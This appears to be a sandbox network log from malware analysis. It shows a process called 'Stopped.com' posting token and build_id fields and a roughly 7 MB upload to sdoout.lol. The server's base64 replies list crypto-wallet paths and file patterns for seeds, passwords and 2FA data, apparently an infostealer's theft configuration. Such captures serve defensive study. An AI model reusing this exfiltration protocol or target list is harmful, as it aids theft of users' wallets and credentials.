2024-12-31 15:57:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	51521	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:00 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----aaaaaaaaaaaaaaaaaaaa User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 0d 0a 43 6f 6e 74 Data Ascii: ------aaaaaaaaaaaaaaaaaaaaContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------aaaaaaaaaaaaaaaaaaaaContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------aaaaaaaaaaaaaaaaaaaaCont
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:58:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	51522	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:01 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----cjw47qi5fcbaimgln7yu User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:01 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 79 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 79 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 77 34 37 71 69 35 66 63 62 61 69 6d 67 6c 6e 37 79 75 0d 0a 43 6f 6e 74 Data Ascii: ------cjw47qi5fcbaimgln7yuContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------cjw47qi5fcbaimgln7yuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------cjw47qi5fcbaimgln7yuCont
2024-12-31 15:58:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:58:02 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	51523	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:03 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4wln7gvsr9hv3ekxb1d2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 34 77 6c 6e 37 67 76 73 72 39 68 76 33 65 6b 78 62 31 64 32 0d 0a 43 6f 6e 74 Data Ascii: ------4wln7gvsr9hv3ekxb1d2Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------4wln7gvsr9hv3ekxb1d2Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------4wln7gvsr9hv3ekxb1d2Cont
2024-12-31 15:58:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:58:03 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	51524	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:04 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58glx4o8qq1dje3ec2n7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:04 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 35 38 67 6c 78 34 6f 38 71 71 31 64 6a 65 33 65 63 32 6e 37 0d 0a 43 6f 6e 74 Data Ascii: ------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------58glx4o8qq1dje3ec2n7Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------58glx4o8qq1dje3ec2n7Cont
2024-12-31 15:58:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:58:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	51526	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:58:08 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gv3ozusj5fkxba1nyua1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:58:08 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 76 33 6f 7a 75 73 6a 35 66 6b 78 62 61 31 6e 79 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 67 76 33 6f 7a 75 73 6a 35 66 6b 78 62 61 31 6e 79 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 67 76 33 6f 7a 75 73 6a 35 66 6b 78 62 61 31 6e 79 75 61 31 0d 0a 43 6f 6e 74 Data Ascii: ------gv3ozusj5fkxba1nyua1Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------gv3ozusj5fkxba1nyua1Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------gv3ozusj5fkxba1nyua1Cont
2024-12-31 15:58:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:58:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

